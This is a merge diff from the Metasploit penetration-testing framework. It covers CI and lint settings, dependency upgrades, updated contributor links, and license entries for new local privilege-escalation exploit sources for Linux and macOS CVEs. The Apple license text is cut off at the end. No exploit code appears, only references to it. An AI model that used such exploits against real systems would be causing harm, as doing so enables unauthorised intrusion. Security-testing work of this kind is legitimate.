Land #17594 , Add larger DLL templates

automatic module_metadata_base.json update
Land #17646 , Link Hadoop YARN exploit to documentation
2023-02-15 19:35:37 -06:00 · 2023-02-15 15:32:23 -06:00 · 2023-02-15 15:09:05 -06:00 · 2023-02-15 21:17:26 +01:00 · 2023-02-15 11:49:57 -06:00 · 2023-02-15 09:07:01 -05:00
1120 changed files with 63014 additions and 28202 deletions
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.7
+          - '2.7'

    name: Ruby ${{ matrix.ruby }}
    steps:
@@ -48,7 +48,7 @@ jobs:
      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
          working-directory: docs

@@ -59,7 +59,7 @@ jobs:
                  comment: `
                    Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

-                    - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+                    - [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
                    - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
                    - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
                  `
@@ -35,7 +35,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.7
+          - '2.7'

    name: Lint msftidy
    steps:
@@ -51,7 +51,7 @@ jobs:

      - uses: ruby/setup-ruby@v1
        with:
-          ruby-version: ${{ matrix.ruby }}
+          ruby-version: '${{ matrix.ruby }}'
          bundler-cache: true
        env:
          BUNDLE_WITHOUT: "coverage development pcap"
@@ -67,6 +67,7 @@ jobs:
          - '2.7'
          - '3.0'
          - '3.1'
+          - '3.2'
        os:
          - ubuntu-20.04
          - ubuntu-latest
@@ -217,6 +217,10 @@ Style/FrozenStringLiteralComment:
  Enabled: false
  Description: 'We cannot support this yet without a lot of things breaking'

+Style/MutableConstant:
+  Enabled: false
+  Description: 'We cannot support this yet without a lot of things breaking'
+
 Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false
@@ -253,6 +257,18 @@ Style/NumericPredicate:
  Description: 'This adds no efficiency nor space saving'
  Enabled: false

+Style/EvenOdd:
+  Description: 'This adds no efficiency nor space saving'
+  Enabled: false
+
+Style/FloatDivision:
+  Description: 'Not a safe rule to run on Metasploit without manual verification as the right hand side may be a string'
+  Enabled: false
+
+Style/FormatString:
+  Description: 'Not a safe rule to run on Metasploit without manual verification that the format is not redefined/shadowed'
+  Enabled: false
+
 Style/Documentation:
  Enabled: true
  Description: 'Most Metasploit modules do not have class documentation.'
@@ -350,6 +366,191 @@ Naming/MethodParameterName:
  Description: 'Whoever made this requirement never looked at crypto methods, IV'
  MinNameLength: 2

+Naming/PredicateName:
+  Enabled: true
+  # Current methods that break the rule, so that we don't add additional methods that break the convention
+  AllowedMethods:
+    - has_additional_info?
+    - has_advanced_options?
+    - has_auth
+    - has_auto_target?
+    - has_bad_activex?
+    - has_badchars?
+    - has_chars?
+    - has_check?
+    - has_command?
+    - has_content_type_extension?
+    - has_datastore_cred?
+    - has_evasion_options?
+    - has_fatal_errors?
+    - has_fields
+    - has_files?
+    - has_flag?
+    - has_function_name?
+    - has_gcc?
+    - has_h2_headings
+    - has_input_name?
+    - has_j_security_check?
+    - has_key?
+    - has_match?
+    - has_module
+    - has_object_ref
+    - has_objects_list
+    - has_options?
+    - has_page?
+    - has_passphrase?
+    - has_pid?
+    - has_pkt_line_data?
+    - has_prereqs?
+    - has_privacy_waiver?
+    - has_privates?
+    - has_protected_mode_prompt?
+    - has_proxy?
+    - has_read_data?
+    - has_ref?
+    - has_required_args
+    - has_required_module_options?
+    - has_requirements
+    - has_rop?
+    - has_s_flag?
+    - has_service_cred?
+    - has_subscriber?
+    - has_subtree?
+    - has_text
+    - has_tlv?
+    - has_u_flag?
+    - has_users?
+    - has_vuln?
+    - has_waiver?
+    - have_auth_error?
+    - have_powershell?
+    - is_accessible?
+    - is_admin?
+    - is_alive?
+    - is_alpha_web_server?
+    - is_android?
+    - is_app_binom3?
+    - is_app_carlogavazzi?
+    - is_app_cnpilot?
+    - is_app_epaduo?
+    - is_app_epmp1000?
+    - is_app_infovista?
+    - is_app_ironport?
+    - is_app_metweblog?
+    - is_app_oilom?
+    - is_app_openmind?
+    - is_app_popad?
+    - is_app_radware?
+    - is_app_rfreader?
+    - is_app_sentry?
+    - is_app_sevone?
+    - is_app_splunk?
+    - is_app_ssl_vpn?
+    - is_array_type?
+    - is_auth_required?
+    - is_author_blacklisted?
+    - is_badchar
+    - is_base64?
+    - is_bind?
+    - is_cached_size_accurate?
+    - is_cgi_enabled?
+    - is_cgi_exploitable?
+    - is_check_interesting?
+    - is_child_of?
+    - is_clr_enabled
+    - is_connect?
+    - is_dlink?
+    - is_dn?
+    - is_dynamic?
+    - is_error_code
+    - is_exception?
+    - is_exploit_module?
+    - is_exploitable?
+    - is_fqdn?
+    - is_glob?
+    - is_groupwise?
+    - is_guest_mode_enabled?
+    - is_hash_from_empty_pwd?
+    - is_high_integrity?
+    - is_hostname?
+    - is_ie?
+    - is_imc?
+    - is_imc_som?
+    - is_in_admin_group?
+    - is_interface?
+    - is_ip_targeted?
+    - is_key_wanted?
+    - is_leaf?
+    - is_local?
+    - is_logged_in?
+    - is_loggedin
+    - is_loopback_address?
+    - is_mac?
+    - is_match
+    - is_md5_format?
+    - is_module_arch?
+    - is_module_platform?
+    - is_module_wanted?
+    - is_multi_platform_exploit?
+    - is_not_null?
+    - is_null_pointer
+    - is_null_pointer?
+    - is_num?
+    - is_num_type?
+    - is_numeric
+    - is_online?
+    - is_parseable
+    - is_pass_ntlm_hash?
+    - is_passwd_method?
+    - is_password_required?
+    - is_payload_compatible?
+    - is_payload_platform_compatible?
+    - is_pointer_type?
+    - is_pri_key?
+    - is_proficy?
+    - is_rdp_up
+    - is_remote_exploit?
+    - is_resource_taken?
+    - is_rf?
+    - is_rmi?
+    - is_root?
+    - is_routable?
+    - is_running?
+    - is_scan_complete
+    - is_secure_admin_disabled?
+    - is_session_type?
+    - is_signature_correct?
+    - is_single_object?
+    - is_struct_type?
+    - is_supermicro?
+    - is_superuser?
+    - is_sws?
+    - is_system?
+    - is_system_user?
+    - is_target?
+    - is_target_suitable?
+    - is_trial_enabled?
+    - is_trustworthy
+    - is_uac_enabled?
+    - is_url_alive
+    - is_usable?
+    - is_uuid?
+    - is_valid?
+    - is_valid_bus?
+    - is_valid_snmp_value
+    - is_value_wanted?
+    - is_version_compat?
+    - is_version_tested?
+    - is_vmware?
+    - is_vul
+    - is_vulnerable?
+    - is_warbird?
+    - is_windows?
+    - is_writable
+    - is_writable?
+    - is_x86?
+    - is_zigbee_hwbridge_session?
+
 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
 Style/RedundantPercentQ:
@@ -1,6 +1,6 @@
 # Contributing to Metasploit
 Thank you for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved.
+world -- a better place!  Before you get started, please review our [Code of Conduct](./CODE_OF_CONDUCT.md). This helps us ensure our community is positive and supportive for everyone involved.

 ## Code Free Contributions
 Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
@@ -15,9 +15,9 @@ Before we get into the details of contributing code, you should know there are m


 ## Code Contributions
-For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/Get-Started-Writing-an-Exploit). It will help you to get started and avoid some common mistakes.
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://docs.metasploit.com/docs/development/developing-modules/guides/get-started-writing-an-exploit.html). It will help you to get started and avoid some common mistakes.

-Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.

 Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
 will be closed. We need to ensure the code we're adding to master is written to a high standard.
@@ -83,7 +83,7 @@ If you need some more guidance, talk to the main body of open source contributor
 Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
 curve, so keep it up!

-[Code of Conduct]:https://github.com/rapid7/metasploit-framework/wiki/CODE_OF_CONDUCT.md
+[Code of Conduct]:https://docs.metasploit.com/docs/code-of-conduct.html
 [Submit bugs and feature requests]:http://r-7.co/MSF-BUGv1
 [Help fellow users with open issues]:https://github.com/rapid7/metasploit-framework/issues
 [help fellow committers test recently submitted pull requests]:https://github.com/rapid7/metasploit-framework/pulls
@@ -101,7 +101,7 @@ curve, so keep it up!
 [PR#9966]:https://github.com/rapid7/metasploit-framework/pull/9966
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
 [API]:https://rapid7.github.io/metasploit-framework/api
-[module documentation]:https://github.com/rapid7/metasploit-framework/wiki/Module-Documentation
+[module documentation]:https://docs.metasploit.com/docs/using-metasploit/basics/module-documentation.html
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
 [Better Specs]:http://www.betterspecs.org/
@@ -1,10 +1,10 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.36)
-      actionpack (~> 6.0)
-      activerecord (~> 6.0)
-      activesupport (~> 6.0)
+    metasploit-framework (6.3.3)
+      actionpack (~> 7.0)
+      activerecord (~> 7.0)
+      activesupport (~> 7.0)
      aws-sdk-ec2
      aws-sdk-iam
      aws-sdk-s3
@@ -29,7 +29,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.105)
+      metasploit-payloads (= 2.0.108)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.20)
      mqtt
@@ -51,6 +51,7 @@ PATH
      pg
      puma
      railties
+      rasn1
      rb-readline
      recog
      redcarpet
@@ -96,30 +97,29 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (6.1.7)
-      actionview (= 6.1.7)
-      activesupport (= 6.1.7)
-      rack (~> 2.0, >= 2.0.9)
+    actionpack (7.0.4.2)
+      actionview (= 7.0.4.2)
+      activesupport (= 7.0.4.2)
+      rack (~> 2.0, >= 2.2.0)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (6.1.7)
-      activesupport (= 6.1.7)
+    actionview (7.0.4.2)
+      activesupport (= 7.0.4.2)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (6.1.7)
-      activesupport (= 6.1.7)
-    activerecord (6.1.7)
-      activemodel (= 6.1.7)
-      activesupport (= 6.1.7)
-    activesupport (6.1.7)
+    activemodel (7.0.4.2)
+      activesupport (= 7.0.4.2)
+    activerecord (7.0.4.2)
+      activemodel (= 7.0.4.2)
+      activesupport (= 7.0.4.2)
+    activesupport (7.0.4.2)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-      zeitwerk (~> 2.3)
    addressable (2.8.1)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
@@ -127,22 +127,22 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.689.0)
-    aws-sdk-core (3.168.4)
+    aws-partitions (1.707.0)
+    aws-sdk-core (3.170.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.651.0)
      aws-sigv4 (~> 1.5)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.356.0)
+    aws-sdk-ec2 (1.364.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.73.0)
+    aws-sdk-iam (1.75.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.61.0)
+    aws-sdk-kms (1.62.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.117.2)
+    aws-sdk-s3 (1.119.0)
      aws-sdk-core (~> 3, >= 3.165.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
@@ -150,12 +150,12 @@ GEM
      aws-eventstream (~> 1, >= 1.0.2)
    bcrypt (3.1.18)
    bcrypt_pbkdf (1.1.0)
-    bindata (2.4.14)
+    bindata (2.4.15)
    bson (4.15.0)
    builder (3.2.4)
    byebug (11.1.3)
    coderay (1.1.3)
-    concurrent-ruby (1.1.10)
+    concurrent-ruby (1.2.0)
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
@@ -184,9 +184,9 @@ GEM
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (3.1.0)
+    faker (3.1.1)
      i18n (>= 1.8.11, < 2)
-    faraday (2.7.2)
+    faraday (2.7.4)
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
@@ -230,11 +230,12 @@ GEM
      nokogiri (>= 1.5.9)
    memory_profiler (1.0.1)
    metasm (1.0.5)
-    metasploit-concern (4.0.5)
-      activemodel (~> 6.0)
-      activesupport (~> 6.0)
-      railties (~> 6.0)
-    metasploit-credential (6.0.1)
+    metasploit-concern (5.0.1)
+      activemodel (~> 7.0)
+      activesupport (~> 7.0)
+      railties (~> 7.0)
+      zeitwerk
+    metasploit-credential (6.0.2)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -244,19 +245,19 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (4.0.6)
-      activemodel (~> 6.0)
-      activesupport (~> 6.0)
-      railties (~> 6.0)
-    metasploit-payloads (2.0.105)
-    metasploit_data_models (5.0.6)
-      activerecord (~> 6.0)
-      activesupport (~> 6.0)
+    metasploit-model (5.0.1)
+      activemodel (~> 7.0)
+      activesupport (~> 7.0)
+      railties (~> 7.0)
+    metasploit-payloads (2.0.108)
+    metasploit_data_models (6.0.2)
+      activerecord (~> 7.0)
+      activesupport (~> 7.0)
      arel-helpers
      metasploit-concern
      metasploit-model (>= 3.1)
      pg
-      railties (~> 6.0)
+      railties (~> 7.0)
      recog
      webrick
    metasploit_payloads-mettle (1.0.20)
@@ -278,7 +279,7 @@ GEM
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.13.10)
+    nokogiri (1.14.1)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
@@ -312,7 +313,7 @@ GEM
    puma (6.0.2)
      nio4r (~> 2.0)
    racc (1.6.2)
-    rack (2.2.5)
+    rack (2.2.6.2)
    rack-protection (3.0.5)
      rack
    rack-test (2.0.2)
@@ -320,21 +321,24 @@ GEM
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.4)
+    rails-html-sanitizer (1.5.0)
      loofah (~> 2.19, >= 2.19.1)
-    railties (6.1.7)
-      actionpack (= 6.1.7)
-      activesupport (= 6.1.7)
+    railties (7.0.4.2)
+      actionpack (= 7.0.4.2)
+      activesupport (= 7.0.4.2)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
+      zeitwerk (~> 2.5)
    rainbow (3.1.1)
    rake (13.0.6)
+    rasn1 (0.12.1)
+      strptime (~> 0.2.5)
    rb-readline (0.5.5)
    recog (3.0.3)
      nokogiri
-    redcarpet (3.5.1)
-    regexp_parser (2.6.1)
+    redcarpet (3.6.0)
+    regexp_parser (2.6.2)
    reline (0.3.2)
      io-console (~> 0.5)
    rex-arch (0.1.14)
@@ -345,12 +349,12 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.28)
+    rex-core (0.1.30)
    rex-encoder (0.1.6)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.36)
+    rex-exploitation (0.1.37)
      jsobfu
      metasm
      rex-arch
@@ -368,21 +372,21 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.9)
+    rex-random_identifier (0.1.10)
      rex-text
    rex-registry (0.1.4)
    rex-rop_builder (0.1.4)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.43)
+    rex-socket (0.1.47)
      rex-core
-    rex-sslscan (0.1.8)
+    rex-sslscan (0.1.9)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.47)
+    rex-text (0.2.49)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -391,12 +395,12 @@ GEM
      rspec-core (~> 3.12.0)
      rspec-expectations (~> 3.12.0)
      rspec-mocks (~> 3.12.0)
-    rspec-core (3.12.0)
+    rspec-core (3.12.1)
      rspec-support (~> 3.12.0)
    rspec-expectations (3.12.2)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.2)
+    rspec-mocks (3.12.3)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.12.0)
    rspec-rails (6.0.1)
@@ -410,16 +414,16 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.12.0)
-    rubocop (1.42.0)
+    rubocop (1.44.1)
      json (~> 2.3)
      parallel (~> 1.10)
-      parser (>= 3.1.2.1)
+      parser (>= 3.2.0.0)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
      rubocop-ast (>= 1.24.1, < 2.0)
      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 1.4.0, < 3.0)
+      unicode-display_width (>= 2.4.0, < 3.0)
    rubocop-ast (1.24.1)
      parser (>= 3.1.1.0)
    ruby-macho (3.0.0)
@@ -427,7 +431,7 @@ GEM
    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.2.1)
+    ruby_smb (3.2.4)
      bindata
      openssl-ccm
      openssl-cmac
@@ -449,9 +453,10 @@ GEM
      rack (~> 2.2, >= 2.2.4)
      rack-protection (= 3.0.5)
      tilt (~> 2.0)
-    sqlite3 (1.5.4)
+    sqlite3 (1.6.0)
      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
+    strptime (0.2.5)
    swagger-blocks (3.0.0)
    thin (1.8.1)
      daemons (~> 1.0, >= 1.0.9)
@@ -462,7 +467,7 @@ GEM
    timecop (0.9.6)
    timeout (0.3.1)
    ttfunk (1.7.0)
-    tzinfo (2.0.5)
+    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
    tzinfo-data (1.2022.7)
      tzinfo (>= 1.0.0)
@@ -478,7 +483,7 @@ GEM
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
-    windows_error (0.1.4)
+    windows_error (0.1.5)
    winrm (2.3.6)
      builder (>= 2.1.2)
      erubi (~> 1.8)
@@ -57,6 +57,20 @@ Copyright: 2018
 License: GNU GPL 3
 Purpose: This supports exploits/windows/local/ms18_8120_win32k_privesc module

+Files: external/source/exploits/CVE-2022-1043/cve-2022-1043.c
+Copyright: 2022 Open Source Security, Inc.
+License: GNU GPL 2.0
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-1043, a local privilege escalation vulnerability in
+         Linux kernels 5.12-rc3 - 5.14-rc7.
+
+Files: external/source/exploits/CVE-2022-22942/cve-2022-22942-dc.c
+Copyright: 2022 Open Source Security, Inc.
+License: GNU GPL 2.0
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-22942, a local privilege escalation vulnerability in
+         Linux kernels 4.14-rc1 - 5.17-rc1.
+
 Files: exteneral/source/exploits/CVE-2022-26904/*
 Copyright: 2022 Abdelhamid Naceri
 License: MIT
@@ -121,6 +135,13 @@ Purpose: The built result is used in:
           payloads/stages/windows/vncinject.rb
           payloads/stages/windows/x64/vncinject.rb

+Files: external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c
+Copyright: 1999-2007 Apple Inc.
+License: Apple
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-46689, a local privilege escalation vulnerability in
+         MacOSX versions (macOS dirty cow)
+
 Files: lib/anemone.rb
       lib/anemone/*
 Copyright: 2009 Vertive, Inc.
@@ -998,3 +1019,372 @@ License: Zlib
 2. Altered source versions must be plainly marked as such, and must not be
    misrepresented as being the original software.
 3. This notice may not be removed or altered from any source distribution.
+
+License: Apple
+APPLE PUBLIC SOURCE LICENSE
+Version 2.0 - August 6, 2003
+
+Please read this License carefully before downloading this software.
+By downloading or using this software, you are agreeing to be bound by
+the terms of this License. If you do not or cannot agree to the terms
+of this License, please do not download or use the software.
+
+1. General; Definitions. This License applies to any program or other
+work which Apple Computer, Inc. ("Apple") makes publicly available and
+which contains a notice placed by Apple identifying such program or
+work as "Original Code" and stating that it is subject to the terms of
+this Apple Public Source License version 2.0 ("License"). As used in
+this License:
+
+1.1 "Applicable Patent Rights" mean: (a) in the case where Apple is
+the grantor of rights, (i) claims of patents that are now or hereafter
+acquired, owned by or assigned to Apple and (ii) that cover subject
+matter contained in the Original Code, but only to the extent
+necessary to use, reproduce and/or distribute the Original Code
+without infringement; and (b) in the case where You are the grantor of
+rights, (i) claims of patents that are now or hereafter acquired,
+owned by or assigned to You and (ii) that cover subject matter in Your
+Modifications, taken alone or in combination with Original Code.
+
+1.2 "Contributor" means any person or entity that creates or
+contributes to the creation of Modifications.
+
+1.3 "Covered Code" means the Original Code, Modifications, the
+combination of Original Code and any Modifications, and/or any
+respective portions thereof.
+
+1.4 "Externally Deploy" means: (a) to sublicense, distribute or
+otherwise make Covered Code available, directly or indirectly, to
+anyone other than You; and/or (b) to use Covered Code, alone or as
+part of a Larger Work, in any way to provide a service, including but
+not limited to delivery of content, through electronic communication
+with a client other than You.
+
+1.5 "Larger Work" means a work which combines Covered Code or portions
+thereof with code not governed by the terms of this License.
+
+1.6 "Modifications" mean any addition to, deletion from, and/or change
+to, the substance and/or structure of the Original Code, any previous
+Modifications, the combination of Original Code and any previous
+Modifications, and/or any respective portions thereof. When code is
+released as a series of files, a Modification is: (a) any addition to
+or deletion from the contents of a file containing Covered Code;
+and/or (b) any new file or other representation of computer program
+statements that contains any part of Covered Code.
+
+1.7 "Original Code" means (a) the Source Code of a program or other
+work as originally made available by Apple under this License,
+including the Source Code of any updates or upgrades to such programs
+or works made available by Apple under this License, and that has been
+expressly identified by Apple as such in the header file(s) of such
+work; and (b) the object code compiled from such Source Code and
+originally made available by Apple under this License.
+
+1.8 "Source Code" means the human readable form of a program or other
+work that is suitable for making modifications to it, including all
+modules it contains, plus any associated interface definition files,
+scripts used to control compilation and installation of an executable
+(object code).
+
+1.9 "You" or "Your" means an individual or a legal entity exercising
+rights under this License. For legal entities, "You" or "Your"
+includes any entity which controls, is controlled by, or is under
+common control with, You, where "control" means (a) the power, direct
+or indirect, to cause the direction or management of such entity,
+whether by contract or otherwise, or (b) ownership of fifty percent
+(50%) or more of the outstanding shares or beneficial ownership of
+such entity.
+
+2. Permitted Uses; Conditions & Restrictions. Subject to the terms
+and conditions of this License, Apple hereby grants You, effective on
+the date You accept this License and download the Original Code, a
+world-wide, royalty-free, non-exclusive license, to the extent of
+Apple's Applicable Patent Rights and copyrights covering the Original
+Code, to do the following:
+
+2.1 Unmodified Code. You may use, reproduce, display, perform,
+internally distribute within Your organization, and Externally Deploy
+verbatim, unmodified copies of the Original Code, for commercial or
+non-commercial purposes, provided that in each instance:
+
+(a) You must retain and reproduce in all copies of Original Code the
+copyright and other proprietary notices and disclaimers of Apple as
+they appear in the Original Code, and keep intact all notices in the
+Original Code that refer to this License; and
+
+(b) You must include a copy of this License with every copy of Source
+Code of Covered Code and documentation You distribute or Externally
+Deploy, and You may not offer or impose any terms on such Source Code
+that alter or restrict this License or the recipients' rights
+hereunder, except as permitted under Section 6.
+
+2.2 Modified Code. You may modify Covered Code and use, reproduce,
+display, perform, internally distribute within Your organization, and
+Externally Deploy Your Modifications and Covered Code, for commercial
+or non-commercial purposes, provided that in each instance You also
+meet all of these conditions:
+
+(a) You must satisfy all the conditions of Section 2.1 with respect to
+the Source Code of the Covered Code;
+
+(b) You must duplicate, to the extent it does not already exist, the
+notice in Exhibit A in each file of the Source Code of all Your
+Modifications, and cause the modified files to carry prominent notices
+stating that You changed the files and the date of any change; and
+
+(c) If You Externally Deploy Your Modifications, You must make
+Source Code of all Your Externally Deployed Modifications either
+available to those to whom You have Externally Deployed Your
+Modifications, or publicly available. Source Code of Your Externally
+Deployed Modifications must be released under the terms set forth in
+this License, including the license grants set forth in Section 3
+below, for as long as you Externally Deploy the Covered Code or twelve
+(12) months from the date of initial External Deployment, whichever is
+longer. You should preferably distribute the Source Code of Your
+Externally Deployed Modifications electronically (e.g. download from a
+web site).
+
+2.3 Distribution of Executable Versions. In addition, if You
+Externally Deploy Covered Code (Original Code and/or Modifications) in
+object code, executable form only, You must include a prominent
+notice, in the code itself as well as in related documentation,
+stating that Source Code of the Covered Code is available under the
+terms of this License with information on how and where to obtain such
+Source Code.
+
+2.4 Third Party Rights. You expressly acknowledge and agree that
+although Apple and each Contributor grants the licenses to their
+respective portions of the Covered Code set forth herein, no
+assurances are provided by Apple or any Contributor that the Covered
+Code does not infringe the patent or other intellectual property
+rights of any other entity. Apple and each Contributor disclaim any
+liability to You for claims brought by any other entity based on
+infringement of intellectual property rights or otherwise. As a
+condition to exercising the rights and licenses granted hereunder, You
+hereby assume sole responsibility to secure any other intellectual
+property rights needed, if any. For example, if a third party patent
+license is required to allow You to distribute the Covered Code, it is
+Your responsibility to acquire that license before distributing the
+Covered Code.
+
+3. Your Grants. In consideration of, and as a condition to, the
+licenses granted to You under this License, You hereby grant to any
+person or entity receiving or distributing Covered Code under this
+License a non-exclusive, royalty-free, perpetual, irrevocable license,
+under Your Applicable Patent Rights and other intellectual property
+rights (other than patent) owned or controlled by You, to use,
+reproduce, display, perform, modify, sublicense, distribute and
+Externally Deploy Your Modifications of the same scope and extent as
+Apple's licenses under Sections 2.1 and 2.2 above.
+
+4. Larger Works. You may create a Larger Work by combining Covered
+Code with other code not governed by the terms of this License and
+distribute the Larger Work as a single product. In each such instance,
+You must make sure the requirements of this License are fulfilled for
+the Covered Code or any portion thereof.
+
+5. Limitations on Patent License. Except as expressly stated in
+Section 2, no other patent rights, express or implied, are granted by
+Apple herein. Modifications and/or Larger Works may require additional
+patent licenses from Apple which Apple may grant in its sole
+discretion.
+
+6. Additional Terms. You may choose to offer, and to charge a fee for,
+warranty, support, indemnity or liability obligations and/or other
+rights consistent with the scope of the license granted herein
+("Additional Terms") to one or more recipients of Covered Code.
+However, You may do so only on Your own behalf and as Your sole
+responsibility, and not on behalf of Apple or any Contributor. You
+must obtain the recipient's agreement that any such Additional Terms
+are offered by You alone, and You hereby agree to indemnify, defend
+and hold Apple and every Contributor harmless for any liability
+incurred by or claims asserted against Apple or such Contributor by
+reason of any such Additional Terms.
+
+7. Versions of the License. Apple may publish revised and/or new
+versions of this License from time to time. Each version will be given
+a distinguishing version number. Once Original Code has been published
+under a particular version of this License, You may continue to use it
+under the terms of that version. You may also choose to use such
+Original Code under the terms of any subsequent version of this
+License published by Apple. No one other than Apple has the right to
+modify the terms applicable to Covered Code created under this
+License.
+
+8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in
+part pre-release, untested, or not fully tested works. The Covered
+Code may contain errors that could cause failures or loss of data, and
+may be incomplete or contain inaccuracies. You expressly acknowledge
+and agree that use of the Covered Code, or any portion thereof, is at
+Your sole and entire risk. THE COVERED CODE IS PROVIDED "AS IS" AND
+WITHOUT WARRANTY, UPGRADES OR SUPPORT OF ANY KIND AND APPLE AND
+APPLE'S LICENSOR(S) (COLLECTIVELY REFERRED TO AS "APPLE" FOR THE
